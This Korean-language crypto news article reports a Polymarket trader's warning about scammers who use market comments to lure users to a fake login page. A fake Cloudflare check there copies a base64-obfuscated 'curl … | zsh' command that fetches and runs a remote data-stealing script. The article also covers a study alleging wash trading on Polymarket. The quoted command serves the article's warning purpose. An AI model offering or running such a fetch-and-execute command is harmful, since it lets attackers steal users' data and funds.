폴리마켓이 또다시 화제의 중심에 섰습니다. 이번에는 "25usdc"라는 닉네임을 사용하는 한 고위 트레이더가 플랫폼의 댓글 기능을 이용해 의심하지 않는 사용자들을 속이는 사기 행각에 대해 경고했기 때문입니다.
이는 폴리마켓 플랫폼이 미국 시장 재진출을 준비하면서 칼시(Kalshi)와 같은 경쟁업체들을 제치기 위해 고군분투하는 중요한 시기에 발생하고 있습니다.
폴리마켓 상인들, 경계 태세 강화
25usdc에 따르면 해커들이 폴리마켓 댓글란을 이용해 사기 행각을 벌이고 있으며, 지금까지 사용자들은 50만 달러 이상의 손실을 입었습니다.
"그들은 '왜 폴리마켓 비공개 시장에서 거래하지 않나요? 거기서는 항상 확률이 훨씬 더 높는데요!'라고 말합니다."라고 25usdc는 쓴 글에서 사기 수법을 설명했습니다.
그의 말에 따르면, 이 모든 것은 그들이 두 개의 서로 다른 계정으로 특정 시장의 찬성(Yes)과 반대(No) 주식을 모두 매수하는 것에서 시작됩니다. 이렇게 하면 "보유자" 필터가 활성화된 경우에도 그들의 댓글이 남아 있게 됩니다. 그 후, 그들은 자신들의 웹사이트 URL을 난독화된 형태로 게시합니다.
해당 URL은 아무것도 모르는 사용자를 폴리마켓 로고가 있는 깔끔한 페이지로 연결하고 이메일을 통한 로그인을 요청합니다. 이메일 인증이 완료되면 클라우드플레어를 사칭하여 사용자의 활동을 인증하라는 새 창이 팝업됩니다.
하지만 25usdc에 따르면 "복사"를 클릭하면 "curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh"와 같은 명령어가 복사되고, 사용자가 실수로 이 명령어를 터미널에 붙여넣으면 가장 먼저 base64로 인코딩된 문자열(서버 URL)을 디코딩한 다음 해당 서버에서 스크립트를 가져와 즉시 실행한다고 합니다.
문제의 스크립트에는 어떤 내용이든 포함될 수 있으며, 팝업 경고도 표시되지 않는다고 합니다. 일단 설치되면 이미 피해는 발생한 것이며, 25usdc에 따르면 유일한 해결책은 Wi-Fi를 끄는 것뿐일 수 있습니다.
25usdc는 "결국 그들은 데이터를 수집하고, 시스템의 모든 활동을 기록한 다음, 압축 파일을 서버로 전송합니다."라고 밝혔습니다. "그런 다음 이 데이터를 사용하여 계정에 로그인하고 돈을 훔칩니다."
그가 알아챈 또 다른 점은 그 그룹이 얼마나 신중하게 활동하는지였습니다. 예를 들어, 그들은 지갑을 자주 바꿔 흔적을 지우고, 모든 단계에서 정보를 모호하게 처리하며, 활동 중인 피해자가 없을 때는 페이로드를 전송하고 로그 데이터를 수신하는 서버를 종료하기까지 합니다.
25usdc는 "이 문제를 해결하는 가장 좋은 방법은 신뢰할 수 있는 사용자가 댓글을 검토할 수 있도록 하거나, 비추천 수가 많은 게시물을 숨기는 비추천 시스템을 도입하는 것"이라고 결론지으며, 현재 폴리마켓이 표시하는 간단한 경고 만으로는 충분하지 않다고 지적했습니다.
공지: 폴리마켓(Polymarket)의 "더 나은 배당률"을 제공하는 "개인 시장" 웹사이트는 존재하지 않습니다
폴리마켓 이메일 주소나 로그인 인증 코드는 당사 공식 웹사이트 외에는 절대로 입력하지 마십시오.
— 폴리마켓 트레이더스 (@PolymarketTrade) 2025년 11월 9일
새로운 연구에 따르면 폴리마켓의 거래량은 가장매매(wash trading)로 부풀려져 있다고 합니다
Cryptopolitan 으로서 에 따르면, 폴리마켓의 거래량은 가장매매로 인해 상당히 부풀려졌다고 합니다.
저자들이 "인위적인 거래"라고 명명한 이 현상은 시간에 따라 변동이 있었지만, 지난 3년간 폴리마켓에서 이루어진 모든 매매 거래의 평균 25%를 차지했다고 합니다.
해당 논문은 아직 동료 심사를 거치지 않았지만, 이미 공개 접근 연구 플랫폼인 SSRN에 게시되었으며 Polymarket에서 검토 중입니다.
폴리마켓 직접적으로 비난하는 것은 아닙니다 . 하지만 그들은 해당 거래소의 암호화폐 기반 구조의 일부 요소들이 가장매매의 가능성을 시사한다고 지적했습니다.
또한 그들은 회사의 고객들이 회사 설립자인 셰인 코플란이 10월 8일에 출시 가능성을 시사했던 독점 디지털 토큰에 접근할 가능성을 높이기 위해 해당 가장매매에dent으로 참여했을 수도 있다고 주장했습니다.
컬럼비아 대학교 경영대학원 교수이자 이번 논문의 공동 저자 4명 중 한 명인 야시 카노리아는 이메일을 통해 "폴리마켓이 우리 논문의 분석 내용을 환영해주길 바랍니다."라고 밝혔습니다. "가장거래는 시장에 유동성이나 정보를 추가하지 않기 때문에, 진짜 거래량과 가짜 거래량을 구분하는 것이 중요해 보입니다."
만약 폴리마켓의 거래량 중 일부가 정말로 "허구"라면, 이는 업계에서 폴리마켓의 상대적 강점에 대한 이해를 바꿀 수 있을 뿐 아니라 예측 시장이 "대중의 지혜"를 반영한다는 현재의 개념을 약화시킬 수 있다고 연구는 주장합니다
"대규모 가장매매의 가능성은 거래량이 플랫폼 활동의 진정한 척도로서 신뢰할 수 없다는 것을 의미하며, 특히 적절한 안전장치가 없을 수 있는 암호화폐 기반 거래소에서는 더욱 그렇다"고 저자들은 결론지었다.
